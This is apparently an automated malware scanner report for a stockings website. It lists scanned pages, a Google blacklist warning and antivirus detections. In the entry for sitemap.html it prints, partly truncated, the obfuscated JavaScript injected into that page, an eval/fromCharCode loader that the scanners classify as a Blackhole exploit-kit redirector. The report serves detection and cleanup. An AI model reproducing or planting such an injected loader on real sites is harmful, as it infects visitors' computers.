New scan:

Malware Scanner report for nylon-dream.com

Malicious/Suspicious/Total urls checked
1/1/15
2 pages have malicious or suspicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "nylon-dream.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/1
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=nylon-dream.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://www.nylon-dream.com/
200 OK
Content-Length: 37212
Content-Type: text/html
clean
http://www.nylon-dream.com/animate.js
200 OK
Content-Length: 15374
Content-Type: application/x-javascript
clean
http://www.nylon-dream.com/verteiler.htm
200 OK
Content-Length: 22576
Content-Type: text/html
suspicious
Page code contains blacklisted domain: www.world-of-clips.com

<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
<title>Fully fashioned nylon stockings presented by Joanne Lafontaine</title>
<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
<meta name=Keywords content="Nylons, Nylon, Nylonsex, Sex in Nylons, ArsVivendi, Ars Vivendi,Secrets in Lace, Strapse, FF-Stockings, Pantyhose, Tights, Stockings, wolford, w
...[4406 bytes skipped]...

http://www.nylon-dream.com/test404page.js
404 Not Found
Content-Length: 960
Content-Type: text/html
clean
http://www.nylon-dream.com/sitemap.html
200 OK
Content-Length: 73353
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

r=eval;function vqvq(){zva=function(){--(d.body)}()};a=("47,155,174,165,152,173,160,166,165,47,155,162,201,67,100,57,60,47,202,24,21,47,175,150,171,47,172,173,150,173,160,152,104,56,150,161,150,177,56,102,24,21,47,175,150,171,47,152,166,165,173,171,166,163,163,154,171,104,56,160,165,153,154,177,65,167,157,167,56,102,24,21,47,175,150,171,47,155,162,201,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,
... 3003 bytes are skipped ...
4,57,56,175,160,172,160,173,154,153,146,174,170,56,60,104,104,74,74,60,202,204,154,163,172,154,202,132,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,63,47,56,74,74,56,63,47,56,70,56,63,47,56,66,56,60,102,24,21,24,21,155,162,201,67,100,57,60,102,24,21,204,24,21,204".split(","));d=document;for(i=0;i<a.length;i+=1){a[i]=-(10-3)+parseInt(a[i],4+4);}try{vqvq()}catch(q){yy=50-50;}try{yy/=72}catch(pq){yy=1;}if(!yy)r(String["fr"+"omCh"+"arCo"+"de"].apply(String,a));

Antivirus reports:

AntiVir
JS/BlacoleRef.DD.40
Avast
JS:Includer-ALC [Trj]
nProtect
JS:Exploit.BlackHole.AY
K7AntiVirus
Riskware
Comodo
TrojWare.JS.Agent.FFF
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.498
TrendMicro
HEUR_HTJS.HDJSFN
Microsoft
Exploit:JS/Blacole.ND
MicroWorld-eScan
JS:Exploit.BlackHole.AY
Fortinet
JS/Redirector.BOZ!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.chulnr
F-Secure
JS:Exploit.BlackHole.AY
F-Prot
JS/IFrame.RS.gen
AVG
Script/Exploit.Kit
Norman
Blacole.WQ
GData
JS:Exploit.BlackHole.AY
Commtouch
JS/IFrame.RS.gen
BitDefender
JS:Exploit.BlackHole.AY

http://www.nylon-dream.com/freetour/html/01.htm
200 OK
Content-Length: 6695
Content-Type: text/html
clean
http://www.nylon-dream.com/freetour/html/02.htm
200 OK
Content-Length: 6702
Content-Type: text/html
clean
http://www.nylon-dream.com/freetour/html/03.htm
200 OK
Content-Length: 6702
Content-Type: text/html
clean
http://www.nylon-dream.com/freetour/html/04.htm
200 OK
Content-Length: 6702
Content-Type: text/html
clean
http://www.nylon-dream.com/freetour/html/05.htm
200 OK
Content-Length: 6457
Content-Type: text/html
clean
http://www.nylon-dream.com/freetour/html/06.htm
200 OK
Content-Length: 6457
Content-Type: text/html
clean
http://www.nylon-dream.com/freetour/html/07.htm
200 OK
Content-Length: 6457
Content-Type: text/html
clean
http://www.nylon-dream.com/freetour/html/08.htm
200 OK
Content-Length: 6457
Content-Type: text/html
clean
http://www.nylon-dream.com/freetour/html/09.htm
200 OK
Content-Length: 6702
Content-Type: text/html
clean
http://www.nylon-dream.com/freetour/html/10.htm
200 OK
Content-Length: 6702
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: nylon-dream.com

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: nylon-dream.com
Referer: http://www.google.com/search?q=nylon-dream.com

Result:
The result is similar to the first query. There are no suspicious redirects found.